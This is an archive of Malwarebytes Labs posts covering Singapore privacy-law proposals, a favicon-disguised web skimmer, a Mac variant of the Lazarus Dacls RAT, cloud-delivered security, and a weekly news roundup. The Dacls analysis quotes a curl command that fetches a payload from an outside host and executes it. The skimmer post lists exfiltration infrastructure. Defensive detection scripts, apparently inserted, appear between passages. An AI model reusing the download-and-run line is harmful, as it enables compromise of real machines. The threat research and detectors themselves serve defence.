Archive for NEWS

Data privacy law updates eyed by Singapore

In early 2019, Singapore’s data privacy regulators proposed that the country’s data privacy law could use two new updates—a data breach notification requirement and a right of data portability for the country’s residents.

The proposed additions are commonplace in several data privacy laws around the world, including, most notably, the European Union General Data Protection Regulation, or GDPR, a sweeping set of data protections that came into effect two years ago.

If Singapore approves its two updates, it would be the latest country in a long line of other countries to align their own data privacy laws with GDPR.

The appeal is clear: Countries that closely hew their own data privacy laws to GDPR have a better shot at obtaining what is called an “adequacy determination” from the European Commission, meaning those countries can legally transfer data between themselves and the EU.

Such a data transfer regime is key to engaging in today’s economy, said D. Reed Freeman Jr., cybersecurity and privacy practice co-chair at the Washington, D.C.-based law firm Wilmer Cutler Pickering Hale and Dorr. If anything, the proposed appeal to GDPR is as much an economic decision as it is one of data privacy rights.

“The world’s economy depends on data flows, and the more restrictive the data flows are, the better,” Freeman said. “Multinational [organizations] in Singapore would like to have an adequacy determination.”

Singapore’s Personal Data Protection Act

On October 15, 2012, Singapore passed its data protection law, the Personal Data Protection Act (PDPA), putting into place new rules for the collection, use, and disclosure of personal data. The PDPA did two other things. It created a national “Do Not Call” register and it established the country’s primary data protection authority, the Personal Data Protection Commission.

For years, the Personal Data Protection Commission has issued warnings to organizations that violate the country’s data protection law, publishing their decisions for the public to read. It is the same commission responsible for the current attempts to update the law.

Today, Singaporeans enjoy some of the same data protection rights found in the European Union and even in California.

For starters, Singaporeans have the right to request that an organization hand over any personal data that belongs to them. Further, Singaporeans also have the right to correct that personal data should they find any errors or omissions.

Singapore’s data privacy law also includes restrictions on how organizations collect, use, or disclose the personal data of Singaporeans.

According to the PDPA, organizations must obtain “consent” before collecting, using, or disclosing personal data (more on that below). Organizations must also abide by “purpose” limitations, meaning that they can “collect, use or disclose personal data about an individual only for purposes that a reasonable person would consider appropriate in the circumstances and, if applicable, have been notified to the individual concerned.” Organizations must notify individuals about planned collection, use, and disclosure of personal data, and collected personal data must be accurate.

Further, any personal data in an organization’s possession must be protected through the implementation of “reasonable security arrangements to prevent unauthorized access, collection, use, disclosure, copying, modification, disposal or similar risks.” And organizations also have to “cease to retain” documents that contain personal data, or “remove the means by which the personal data can be associated with particular individuals” after the purpose for collecting personal data ends.

While these rules sound similar to GDPR, there are discrepancies—including how Singapore and the EU approach “consent.” In Singapore’s PDPA, consent is not required to collect personal data when that data is publicly available, is necessary for broadly defined “evaluative purposes,” or collected solely for “artistic or literary purposes.” In the EU, there are no similar exceptions.

Two other areas where the laws differ are, of course, data portability and data breach notification requirements. Singapore’s law has none.

Proposed data privacy additions

On February 25, 2019, Singapore’s Personal Data Protection Commission published a “discussion paper” on data portability, explaining the benefits of adding a data portability requirement to the PDPA.

“Data portability, whereby users are empowered to authorize the movement of their personal data across organizations, can boost data flows and support greater data sharing in a digital economy both within and across sectors,” the PDPC said in a press release.

With a right to data portability, individuals can request that organizations hand over their personal data in a format that lets them easily move it to another provider and basically plug it in for immediate use. Think of it like taking your email contacts from one email provider to another, but on a much larger scale and with potentially less value—it’s not like your Facebook status updates from 2008 will do you much good on Twitter today.

Less than one week after publishing its data portability discussion paper, the Personal Data Protection Commission also announced plans to add a data breach notification requirement to the PDPA.

The Personal Data Protection Commission proposed that if organizations suffered a data breach that potentially harmed individuals, those individuals and the PDPC itself would need to be notified. Further, even if a data breach brought no potential harm to individuals, organizations would need to notify the PDPC if more than 500 people’s personal data was affected.

Following public consultations, the data portability requirement was well-received.

Why attempt data privacy updates now?

Aligning a country’s data protection laws with the protections provided in GDPR is nothing new, and in fact, multiple countries around the world are currently engaged in the same process. But Singapore’s timing could potentially be further pinned down to another GDPR development in early January of 2019—an adequacy determination granted by the European Commission to another country, Japan.

Wilmer Hale’s Freeman said it is likely that Singapore looked to Japan and wanted the same.

“[Singapore] is competing in the Asia market and in the global market, and I would suspect that the leaders in Singapore saw what happened in Japan, asked the relevant people at the Commission, ‘What do we need to do to get that?’ and were told ‘If you line up [PDPA] pretty close, we have a good chance of getting an adequacy determination,’” Freeman said.

Freeman explained that, in recent history, obtaining an adequacy determination relies on whether a country’s data protection laws are similar to GDPR.

“Over time, it’s been sort of short-hand thought of as ‘adequacy’ means something close to ‘equivalent,’” Freeman said.

As to the importance, Freeman explained that any multinational business that wants to move data between its home country and the EU must, per the rules of GDPR, obtain an adequacy determination. No determination, no legal opportunity to engage in the world’s economy.

“If you’re a multinational company and you have employees and customers in Europe, and you want to store the data at the home office in Singapore, you need a lawful basis to do that,” Freeman said. An adequacy determination is that legal basis, Freeman said, and it’s far more difficult to “undo” an adequacy determination than it is a bilateral agreement, like the one struck down by the Court of Justice for the European Union between the EU and the United States.

Don’t reinvent the data privacy wheel

Singapore has not proposed a time frame for when it wants to finalize the data portability rights and data breach notification requirements. Nor has it specified the actual regulations it would put in place—including how long before the Personal Data Protection Commission would enforce the new requirements, or what those enforcement actions would entail.

Freeman suggested that when the Singaporean government clarifies its proposals, it look to its neighbors across the world who have grappled with the same questions on data breach notifications and data portability.

For data portability, Freeman explained that many large corporations have already struggled to comply with the rules both in GDPR and in the California Consumer Privacy Act, not because of an inability to do so, but because providing such in-depth data access to individuals requires understanding all the places where an individual’s personal data can live.

“Is it stored locally? On servers in different places? Is it in email? In instant messaging? On posts?” Freeman said.

For data breach notification requirements, Freeman also said that it makes little sense to create something “out of whole cloth” that will create new burdens on multinational businesses that already have to comply with the data breach notification requirements in GDPR and in the 50 US states.

It’s better to find what currently works, Freeman said, and borrow.

The post Data privacy law updates eyed by Singapore appeared first on Malwarebytes Labs.


Credit card skimmer masquerades as favicon

Malware authors are notorious for their deceptive attempts at staying one step ahead of defenders. As their schemes get exposed, they always need to go back to their bag of tricks to pull out a new one.

When it comes to online credit card skimmers, we have already seen a number of evasion techniques, some fairly simple and others more elaborate. The goal remains to deceive online shoppers while staying under the radar from website administrators and security scanners.

In this latest instance, we observed an old server-side trick combined with the clever use of an icon file to hide a web skimmer. Threat actors registered a new website purporting to offer thousands of images and icons for download, but which in reality has a single purpose: to act as a façade for a credit card skimming operation.

The suspicious favicon

This latest case started with an image file displayed in the browser’s tab, often used for branding or identifying a website, also known as a favicon.

Figure 1: Some favicons from popular websites

While reviewing our crawler logs, we noticed requests to a domain called myicons[.]net hosting various icons and, in particular, favicons. Several e-commerce sites were loading a Magento favicon from this domain.

Figure 2: A favicon.png for the Magento CMS

This in itself is not particularly suspicious. However, we noticed that the domain myicons[.]net was registered just a few days ago and was hosted on a server (83.166.244[.]76) that was previously identified as malicious. In a blog post, web security company Sucuri disclosed how this host was part of a web skimming campaign using time-based domain names.

In addition, we found that the person who registered myicons[.]net stole all the content from a legitimate site hosted at iconarchive.com; and they did it in the simplest way—by loading it as an iframe:

<iframe src="http://www.iconarchive.com/" width="100%" height="1015px" frameborder="0" align="left"></iframe>

Figure 3: Decoy site with original site

Our suspicions were that the favicon.png file was malicious and perhaps using steganography to hide JavaScript code. But this was not the case. The image was properly formatted, with no extra code inside.

Figure 4: Suspicious image file turns out to be clean

Conditional server-side response

To better understand what was going on before ruling this out as a false alert, we examined how this file was served in the context of an online purchase. Lo and behold, when visiting the checkout page of a compromised Magento website, the innocent favicon.png turned into something else altogether.

Figure 5: The same web request with a referer including the ‘checkout’ keyword

Instead of serving a PNG image, the malicious server returns JavaScript code that consists of a credit card payment form. This content is loaded dynamically in the DOM to override the PayPal checkout option with its own drop-down menu for MasterCard, Visa, Discover and American Express.

Figure 6: Malicious content hijacks default payment form
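As an added example (not code from this post), the script below shows how a store owner can check a third-party resource their pages load for the Referer-conditional behaviour described above: the same URL is compared once with a neutral Referer and once with a Referer containing “checkout”, each body is classified by its actual bytes rather than the declared Content-Type, and an image-to-script switch is reported. The two sample responses are constructed, and fetch_variants is an assumed helper for use against resources embedded in your own site.

```python
"""Detect a resource that serves an image normally but script on checkout pages.

Added example, not code from the post. The sample responses below are
constructed; fetch_variants() is a helper for checking resources that your
own site embeds.
"""
import hashlib
import urllib.request

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
# Byte patterns a PNG should never contain near its start but an injected
# payment form or DOM-rewriting script typically does.
SCRIPT_HINTS = (b"document.", b"function", b"<form", b"<input", b"eval(")


def body_kind(body):
    """Classify a body by its bytes: 'png', 'script-like' or 'unknown'."""
    if body.startswith(PNG_MAGIC):
        return "png"
    if any(hint in body[:4096] for hint in SCRIPT_HINTS):
        return "script-like"
    return "unknown"


def compare_variants(neutral, checkout):
    """Compare two responses for one URL fetched with different Referers.

    Each response is a dict with 'content_type' and 'body' (bytes).
    Returns a list of findings; an empty list means nothing looked off.
    """
    findings = []
    kinds = {}
    for name, resp in (("neutral", neutral), ("checkout", checkout)):
        kinds[name] = body_kind(resp["body"])
        declared = resp["content_type"].split(";")[0].strip().lower()
        # A server claiming image/* while sending script is lying.
        if declared.startswith("image/") and kinds[name] == "script-like":
            findings.append(f"{name}: Content-Type {declared} but body is script-like")
    if kinds["neutral"] != kinds["checkout"]:
        findings.append(
            f"Referer-conditional response: {kinds['neutral']} without "
            f"'checkout' in Referer, {kinds['checkout']} with it")
    elif hashlib.sha256(neutral["body"]).digest() != hashlib.sha256(checkout["body"]).digest():
        # Same kind but different bytes: worth a look, not necessarily malicious.
        findings.append("body bytes differ between Referers (same kind)")
    return findings


def fetch_variants(url, shop_origin):
    """Fetch url twice: once from a neutral page, once from a checkout URL.

    shop_origin is your own store's origin, e.g. 'https://shop.example'.
    Network helper only; not used by the constructed sample below.
    """
    out = {}
    for name, referer in (("neutral", shop_origin + "/"),
                          ("checkout", shop_origin + "/checkout/")):
        req = urllib.request.Request(url, headers={"Referer": referer})
        with urllib.request.urlopen(req, timeout=15) as resp:
            out[name] = {"content_type": resp.headers.get("Content-Type", ""),
                         "body": resp.read()}
    return compare_variants(out["neutral"], out["checkout"])


# Constructed samples standing in for the two observed server responses.
# The checkout sample keeps a declared image/png type (constructed, the real
# header was not reported) so the Content-Type mismatch check is exercised.
SAMPLE_NEUTRAL = {"content_type": "image/png",
                  "body": PNG_MAGIC + b"\x00\x00\x00\rIHDR" + b"\x00" * 64}
SAMPLE_CHECKOUT = {"content_type": "image/png",
                   "body": b"(function(){var f=document.createElement('form');"
                           b"f.innerHTML='<input name=cc>';})();"}

if __name__ == "__main__":
    for line in compare_variants(SAMPLE_NEUTRAL, SAMPLE_CHECKOUT):
        print(line)
```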

“Ant and cockroach” skimmer

This skimmer may be familiar to some under the nickname “ant and cockroach.” It is somewhat unique in that it is customized for English and Portuguese checkout forms.

In addition to JavaScript code, it contains HTML that will be injected into the checkout page of compromised stores. The idea is to blend in so that shoppers don’t notice anything suspicious.

Figure 7: Rogue HTML form injected into checkout page

While web skimmers primarily focus on credit card data, they typically also collect additional personal information about the victims, including name, address, phone number, and email.

Figure 8: Data fields collected by the skimmer

That data is encoded and then sent back to the criminals. For client-side skimmers, the exfiltration domain could be another hacked site or a malicious site registered strictly for this purpose.

Figure 9: Exfiltration code sending data back to the criminals

Here the exfiltration domain is psas[.]pw and resides on known criminal infrastructure on the IP address 83.166.242[.]105. Back in March we described a campaign abusing Cloudflare’s Rocket Loader script which we believe is tied to the same threat group.

One of many web skimmer campaigns

Given the decoy icons domain registration date, this particular scheme is about a week old but is part of a larger number of ongoing skimming attacks.

Malwarebytes users are protected via our real-time web security module available in both Malwarebytes for Windows and via our Browser Guard extension available for both Google Chrome and Mozilla Firefox.

Figure 10: Malwarebytes Browser Guard blocking data exfiltration

Indicators of Compromise

Skimmer URL, domain, IP and SHA256

myicons[.]net/d/favicon.png
myicons[.]net
83.166.244[.]76
825886fc00bef43b3b7552338617697c4e0bab666812c333afdce36536be3b8e

Exfiltration domain and IP

psas[.]pw
83.166.242[.]105

The post Credit card skimmer masquerades as favicon appeared first on Malwarebytes Labs.


New Mac variant of Lazarus Dacls RAT distributed via Trojanized 2FA app

This blog post was authored by Hossein Jazi, Thomas Reed and Jérôme Segura.

We recently identified what we believe is a new variant of the Dacls Remote Access Trojan (RAT) associated with North Korea’s Lazarus group, designed specifically for the Mac operating system.

Dacls is a RAT that was discovered by Qihoo 360 NetLab in December 2019 as a fully functional covert remote access Trojan targeting the Windows and Linux platforms.

This Mac version is distributed at least via a Trojanized two-factor authentication application for macOS called MinaOTP, mostly used by Chinese speakers. Similar to the Linux variant, it boasts a variety of features including command execution, file management, traffic proxying, and worm scanning.

Discovery

On April 8th, a suspicious Mac application named “TinkaOTP” was submitted to VirusTotal from Hong Kong. It was not detected by any engines at the time.

The malicious bot executable is located in the “Contents/Resources/Base.lproj/” directory of the application and pretends to be a nib file (“SubMenu.nib”) while it is actually a Mac executable. It contained the strings “c_2910.cls” and “k_3872.cls”, which are the names of certificate and private key files that had been previously observed.

Persistence

This RAT persists through LaunchDaemons or LaunchAgents, which take a property list (plist) file that specifies the application that needs to be executed after reboot. The difference between LaunchAgents and LaunchDaemons is that LaunchAgents run code on behalf of the logged-in user while LaunchDaemons run code as the root user.

When the malicious application starts, it creates a plist file with the “com.aex-loop.agent.plist” name under the “Library/LaunchDaemons” directory. The content of the plist file is hardcoded within the application.

The program also checks if “getpwuid(getuid())” returns the user ID of the current process. If a user ID is returned, it creates the plist file “com.aex-loop.agent.plist” under the LaunchAgents directory: “Library/LaunchAgents/”.

Figure 1: Plist file

The file name and directory to store the plist are in hex format and appended together. They show the filename and directory backwards.

Figure 2: Directory and file name generation

Config File

The config file contains the information about the victim’s machine such as Puid, Pwuid, plugins and C&C servers. The contents of the config file are encrypted using the AES encryption algorithm.

Figure 3: Load config

Both Mac and Linux variants use the same AES key and IV to encrypt and decrypt the config file. The AES mode in both variants is CBC.

Figure 4: AES Key and IV

The config file location and name are stored in hex format within the code. The name of the config file pretends to be a database file related to the Apple Store:

“Library/Caches/Com.apple.appstore.db”

Figure 5: Config file name

The “IntializeConfiguration” function initializes the config file with the following hardcoded C&C servers.

Figure 6: Initialize config file

The config file is constantly updated by receiving commands from the C&C server. The application name after installation is “mina”. Mina comes from the MinaOTP application which is a two-factor authentication app for macOS.

Figure 7: Config file is being updated

Main Loop

After initializing the config file, the main loop is executed to perform the following four main commands:

  • Upload C&C server information from the config file to the server (0x601)
  • Download the config file contents from the server and update the config file (0x602)
  • Upload collected information from the victim’s machine by calling “getbasicinfo” function (0x700)
  • Send heartbeat information (0x900)

The command codes are exactly the same as Linux.dacls.

Figure 8: Main Loop

Plugins

This Mac RAT has all six plugins seen in the Linux variant plus an additional plugin named “SOCKS”. This new plugin is used to proxy network traffic from the victim to the C&C server.

The app loads all seven plugins at the start of the main loop. Each plugin has its own configuration section in the config file, which is loaded at the initialization of the plugin.

Figure 9: Plugins loaded

CMD plugin

The cmd plugin is similar to the “bash” plugin in the Linux RAT, which receives and executes commands by providing a reverse shell to the C&C server.

Figure 10: Cmd Plugin

File Plugin

The file plugin has the capability to read, delete, download, and search files within a directory. The only difference between the Mac and Linux version is that the Mac version does not have the capability to write files (Case 0).

Figure 11: File plugin

Process plugin

The process plugin has the capability to kill and run processes, get process IDs, and collect process information.

Figure 12: Process Plugin

If the “/proc/%d/task” directory of a process is accessible, where %d is the process ID, the plugin obtains the following information from the process:

  • Command line arguments of the process from the “/proc/%d/cmdline” file
  • Name, Uid, Gid, and PPid of the process from the “/proc/%d/status” file

Test plugin

The code for the Test plugin is the same between the Mac and Linux variants. It checks the connection to an IP and port specified by the C&C servers.

RP2P plugin

The RP2P plugin is a proxy server used to avoid direct communications from the victim to the actor’s infrastructure.

Figure 13: Reverse P2P

LogSend plugin

The Logsend plugin contains three modules that:

  • Check the connection to the log server
  • Scan the network (worm scanner module)
  • Execute long-running system commands

Figure 14: Logsend Plugin

This plugin sends the collected logs using HTTP post requests.

Figure 15: User Agent

An interesting function in this plugin is the worm scanner. The “start_worm_scan” function can scan a network subnet on ports 8291 or 8292. The subnet that gets scanned is determined based on a set of predefined rules. The following diagram shows the process of selecting the subnet to scan.

Figure 16: Worm Scan
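A subnet sweep on ports 8291 and 8292 is a noisy pattern in network telemetry. As an added example (not from the post), this detector walks connection records and flags any source that reaches many distinct hosts on those ports inside a short sliding window; the record format and the log lines are constructed.

```python
"""Flag hosts sweeping a subnet on the Dacls worm-scanner ports 8291/8292.

Added example, not from the post. Records are constructed in the form
'<epoch_ts> <src_ip> <dst_ip> <dst_port>' (one connection attempt per line),
which is easy to derive from a Zeek conn.log or a firewall export.
"""
from collections import defaultdict, deque

WORM_PORTS = {8291, 8292}


def parse_record(line):
    """Parse one record; returns (ts, src, dst, port) or None for junk."""
    parts = line.split()
    if len(parts) != 4:
        return None
    try:
        return float(parts[0]), parts[1], parts[2], int(parts[3])
    except ValueError:
        return None


def detect_sweeps(lines, ports=WORM_PORTS, threshold=8, window=60.0):
    """Return {src: max distinct destinations hit on `ports` within `window`}.

    Only sources that reach `threshold` distinct destinations inside one
    sliding window are reported. Records need not be sorted.
    """
    recs = [r for r in map(parse_record, lines) if r and r[3] in ports]
    recs.sort()
    recent = defaultdict(deque)      # src -> deque of (ts, dst) inside the window
    alerts = {}
    for ts, src, dst, _port in recs:
        q = recent[src]
        q.append((ts, dst))
        while q and ts - q[0][0] > window:
            q.popleft()              # drop attempts older than the window
        distinct = len({d for _t, d in q})
        if distinct >= threshold:
            alerts[src] = max(alerts.get(src, 0), distinct)
    return alerts


# Constructed telemetry: 10.0.0.5 sweeps 10.0.0.10-.29 on 8291 within 40 s;
# 10.0.0.7 touches two hosts, which stays below the threshold.
SAMPLE_LOG = [f"{1000 + i * 2} 10.0.0.5 10.0.0.{10 + i} 8291" for i in range(20)]
SAMPLE_LOG += [
    "1003 10.0.0.7 10.0.0.50 443",      # unrelated port, ignored
    "1004 10.0.0.7 10.0.0.51 8291",     # isolated hits, below threshold
    "1005 10.0.0.7 10.0.0.52 8292",
    "garbage line",                     # malformed, skipped
]

if __name__ == "__main__":
    for src, count in detect_sweeps(SAMPLE_LOG).items():
        print(f"{src}: {count} distinct hosts on worm-scan ports")
```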

Socks plugin

The Socks plugin is the new, seventh plugin added to this Mac RAT. It is similar to the RP2P plugin and acts as an intermediary to direct the traffic between the bot and C&C infrastructure. It uses SOCKS4 for its proxy communications.

Figure 17: Socks4

Network Communications

C&C communication used by this Mac RAT is similar to the Linux variant. To connect to the server, the application first establishes a TLS connection, then performs beaconing, and finally encrypts the data sent over SSL using the RC4 algorithm.

Figure 18: Traffic generated by the Application (.mina)

Figure 19: TLS connection

Both Mac and Linux variants use the WolfSSL library for SSL communications. WolfSSL is an open-source implementation of TLS in C that supports multiple platforms. This library has been used by several threat actors. For example, Tropic Trooper used this library in its Keyboys malware.

Figure 20: WolfSSL

The command codes used for beaconing are the same as the codes used in Linux.dacls. This is to confirm the identity of the bot and the server.

Figure 21: Beaconing

The RC4 key is generated by using a hard-coded key.

Figure 22: RC4 Initialization

Variants and detection

We also identified another variant of this RAT which downloads the malicious payload using the following curl command:

curl -k -o ~/Library/.mina https://loneeaglerecords.com/wp-content/uploads/2020/01/images.tgz.001 > /dev/null 2>&1 && chmod +x ~/Library/.mina > /dev/null 2>&1 && ~/Library/.mina > /dev

We believe this Mac variant of the Dacls RAT is associated with the Lazarus group, also known as Hidden Cobra and APT 38, an infamous North Korean threat actor performing cyber espionage and cyber-crime operations since 2009.

The group is known to be one of the most sophisticated actors, capable of making custom malware to target different platforms. The discovery of this Mac RAT shows that this APT group is constantly developing its malware toolset.

Malwarebytes for Mac detects this remote administration Trojan as OSX-DaclsRAT.
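Pulling together the host artifacts named in this write-up (the Mach-O posing as SubMenu.nib inside Base.lproj, the com.aex-loop.agent.plist persistence entry, the Com.apple.appstore.db config file and the ~/Library/.mina payload dropped by the curl variant), here is an added hunt script. It is not Malwarebytes’ detection; the indicator names come from the analysis above, and the infected directory layout built by run_demo() is constructed for illustration.

```python
"""Hunt for the Mac Dacls RAT artifacts named in the analysis above.

Added example, not Malwarebytes' code. Names and paths come from the
write-up; the tree built by run_demo() is constructed for illustration.
"""
import os
import shutil
import tempfile

PLIST_NAME = "com.aex-loop.agent.plist"                                   # persistence
CONFIG_REL = os.path.join("Library", "Caches", "Com.apple.appstore.db")  # AES-CBC config
PAYLOAD_REL = os.path.join("Library", ".mina")                            # curl-dropped payload
LAUNCH_DIRS = (
    os.path.join("Library", "LaunchDaemons"),   # runs as root
    os.path.join("Library", "LaunchAgents"),    # runs as the logged-in user
)
# Mach-O magic numbers: 32/64-bit in both byte orders, plus fat binaries.
MACHO_MAGIC = {
    b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",
    b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe",
    b"\xca\xfe\xba\xbe", b"\xbe\xba\xfe\xca",
}


def is_macho(path):
    """True if the file begins with a Mach-O or fat-binary magic number."""
    try:
        with open(path, "rb") as fh:
            return fh.read(4) in MACHO_MAGIC
    except OSError:
        return False


def hunt(system_root, home, app_dirs=("Applications",)):
    """Return sorted (indicator, path) pairs found under the given roots.

    system_root stands in for '/' and home for the user's home directory, so
    the scan can be pointed at a mounted disk image or a test tree. App
    bundles are searched under app_dirs (relative to system_root) and home.
    """
    found = set()
    for base in (system_root, home):
        for ld in LAUNCH_DIRS:
            p = os.path.join(base, ld, PLIST_NAME)
            if os.path.isfile(p):
                found.add(("dacls persistence plist", p))
    for rel, label in ((CONFIG_REL, "dacls encrypted config"),
                       (PAYLOAD_REL, "dacls payload (.mina)")):
        p = os.path.join(home, rel)
        if os.path.isfile(p):
            found.add((label, p))
    # A real .nib is a (binary) plist; a Mach-O under Base.lproj is not a nib.
    roots = [os.path.join(system_root, d) for d in app_dirs] + [home]
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            if os.path.basename(dirpath) != "Base.lproj":
                continue
            for name in files:
                full = os.path.join(dirpath, name)
                if name.endswith(".nib") and is_macho(full):
                    found.add(("Mach-O disguised as nib", full))
    return sorted(found)


def _write(path, data):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)


def run_demo():
    """Build a constructed infected layout in a temp dir, scan it, clean up."""
    root = tempfile.mkdtemp()
    try:
        home = os.path.join(root, "Users", "victim")
        _write(os.path.join(root, "Library", "LaunchDaemons", PLIST_NAME), b"<plist/>")
        _write(os.path.join(home, CONFIG_REL), b"\x00" * 32)
        _write(os.path.join(home, PAYLOAD_REL), b"\xcf\xfa\xed\xfe" + b"\x00" * 28)
        lproj = os.path.join(root, "Applications", "TinkaOTP.app",
                             "Contents", "Resources", "Base.lproj")
        _write(os.path.join(lproj, "SubMenu.nib"), b"\xcf\xfa\xed\xfe" + b"\x00" * 28)
        _write(os.path.join(lproj, "MainMenu.nib"), b"bplist00")  # genuine nib: must not fire
        return [label for label, _path in hunt(root, home)]
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for label in run_demo():
        print(label)
```

On a live system point hunt("/", os.path.expanduser("~")) at the real roots; walking all of "/" is slow, so the bundle search is limited to app_dirs and the home directory.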

IOCs


The post New Mac variant of Lazarus Dacls RAT distributed via Trojanized 2FA app appeared first on Malwarebytes Labs.


Explained: cloud-delivered security

As a counterpart to security for your assets in the cloud, you may also run into solutions that offer security from the cloud. These solutions are generally referred to as cloud-delivered security. Cloud-delivered security is sometimes called security-as-a-service, a term we will avoid here as it might be confused with the more generally used term Software-as-a-Service (SaaS).

Types of cloud-delivered security

It is not hard to imagine several types of cloud-delivered security:

  • Definitions or rules for detection are in the cloud
  • Security controls and logs for systems located in multiple places are kept in the cloud
  • Suspicious files that are not recognized are uploaded to the cloud for closer inspection
  • The security applications run completely or partially in the cloud and check on the security health of the physical systems

With detection criteria in the cloud there is only one update needed for new definitions and not for every individual system.

Controls and logs in the cloud let security management sit at the center of the web, from virtually anywhere.

The closer inspection of the suspicious file can be done by the security provider itself or by a more general resource such as VirusTotal.

Using containerization, security applications can be shared amongst different systems, even if they are running a different operating system.

Models of cloud-delivered security

Besides these different types, there are also three basic cloud delivery models:

  • Software as a Service (SaaS)
  • Platform as a Service (PaaS)
  • Infrastructure as a Service (IaaS)

SaaS clients use applications supplied by a service provider. SaaS does not allow or require any control of the cloud platform or the infrastructure. This can be beneficial to some organizations while others would like at least some control.

PaaS users can deploy consumer-created or acquired applications using programming languages and tools supported by the provider’s content policies. This limits the choices, but it also enhances security.

IaaS is interesting for more sophisticated and demanding users as it allows them to deploy and run arbitrary software. This could apply to both operating systems and applications.

The main difference for these three delivery models is the internal organization of the cloud infrastructure. For the user this mainly results in a degree of freedom in how to use the infrastructure.

Cloud-enabled architecture

A cloud-enabled architecture is by definition built in the cloud and delivered as a service. This means it provides a platform that you can easily deploy, and it will help you minimize the need for costly appliances and backhauling.

Even more than when you are starting to use a cloud-enabled architecture, moving existing critical capabilities such as endpoint security into the cloud requires careful consideration of a wide range of privacy and security assurances. But sometimes the choice between the two isn’t available: circumstances do not always allow for the easy path of stepping into a readily prepared platform.

SaaS-based, cloud-enabled architecture should provide customers with a system that can be operational in minutes and requires no on-premise infrastructure. It may combine multiple security functions into one solution, so you can extend protection to devices, remote users, and distributed locations anywhere.

Integrated cloud security service benefits:

  • Flexible security protection on and off network
  • Consistent policies across remote locations
  • Easier to scale on a subscription-based model

Benefits of cloud-delivered security

There are several benefits of cloud-delivered security:

  • The protection will benefit all cloud resources and the SaaS applications
  • It makes it easier to get insight into mobile users, application usage, and overall traffic
  • Enhancement of management efficiency because it can be centralized and done with minimal effort
  • Significant improvement in discovered malware incidents and attempted breaches
  • As a result, a reduction of security related downtime
  • Ease of gathering sufficient audit evidence

What to look for in cloud-delivered security

There are several aspects organizations may be looking for in a cloud security solution. These can vary by type of organization and their priorities. In no particular order these may be:

  • Assistance from security vendors
  • Cloud administration and management
  • Scalability and cost efficiency
  • Protection of all critical infrastructure
  • Extra features

Security should work for the organization and not the other way around. Security vendors are expected to assume a stronger, more active role in managing and helping the client to maintain the protection of their systems and network(s). Cloud-delivered security allows the organization to focus on their business and abandon or reduce the do-it-yourself security approach.

For businesses looking to simplify their security management through the elimination of hardware, reduced administration, and centralized management, the cloud is the most viable option. And it allows the vendor or a provider to perform remote administration and management.

Cloud-delivered services can dynamically grow and shrink based on the needs of the organization, and you only pay for what you need based on usage. Moreover, they can also be less expensive to acquire since they are usually sold on a subscription basis, where payments are spread out over time.

To optimize the use of assistance, centralized management, and scalability, a cloud-delivered security solution should be designed to protect all critical infrastructure, applications, and data delivered as-a-service.

Usually organizations can add extra services or features to the security solution, which can include, for example, identity management, email security, and other features.

Possible drawbacks of cloud-delivered security

Some organizations may shy away from cloud-delivered security for various reasons.

Organizations may feel they have less control over the functionality of the security solution, which is not always justified as it will depend on the chosen model. And most of the time you will still be able to file feature requests with the vendor and work them out.

Organizations may have doubts about the privacy of the delivered technology and storage of logs in the cloud. But if you can’t trust your security vendor there is a worse problem that needs to be solved first.

Further, data residency can lead to compliance issues for some organizations in some countries. This absolutely should be researched before onboarding with a vendor. It would be a shame to engage in an onboarding process only to find out that there will be compliance issues.

Smaller businesses and cloud-delivered security

Smaller businesses can still profit from cloud-delivered security by acquiring it from a Managed Services Provider (MSP). Security vendors will provide MSPs with a cloud management console where they can keep an eye on all their customers. This enables the MSP to protect, monitor and remediate against security threats.

Stay safe everyone!

The post Explained: cloud-delivered security appeared first on Malwarebytes Labs.


A week in security (April 27 – May 3)

Last week on Malwarebytes Labs, we looked at how secure the cloud is, understood why unexpected demand can influence an organization to consider their “just in time” (JIT) system, speculated on why the threat actors behind the Troldesh ransomware suddenly released thousands of decryption keys, preached the good news about VPN being mainstream, touched on the relationship between cybercrime and a challenged economy, and identified what users can do if they received an extortion email.

Other cybersecurity news

  • The season of threat actors banking on coronavirus continues as fake news sites spring up to promote a “pandemic survival book.” (Source: Avast Blog)
  • Cybersecurity experts warned small- to medium-sized businesses about an increase in targeted attacks, thanks to the pandemic (Source: TechRadar)
  • While internet users are using VPN all the more, experts have seen attacks on something probably no one has thought about protecting: the router. (Source: InfoSecurity)
  • Phishers targeted Zoom users yet again with spoofed meeting notifications that would likely cause them to panic and click the phishing link. (Source: Bleeping Computer)
  • Payment card details owned by US and South Korean citizens were reportedly sold underground for $2M USD. (Source: Group-IB)
  • While governments have renewed interest in using contact tracing apps to help contain COVID-19, interest in Bluetooth attacks may naturally follow. (Source: ZDNet)
  • Israel’s National Cyber Directorate published an alert about attacks on supervisory control and data acquisition (SCADA) systems. (Source: Security Week)
  • Parking meter vendor CivicSmart was attacked by ransomware and had their data stolen. (Source: StateScoop)
  • Some ransomware gangs opted out of targeting hospitals. For others, it’s business as usual: a Colorado hospital was shut down by ransomware. (Source: Health IT Security)
  • OceanLotus APT is suspected to be behind an espionage campaign dubbed PhantomLance, which targeted specific victims in Southeast Asia. (Source: Threatpost)

Stay safe everyone!

The post A week in security (April 27 – May 3) appeared first on Malwarebytes Labs.
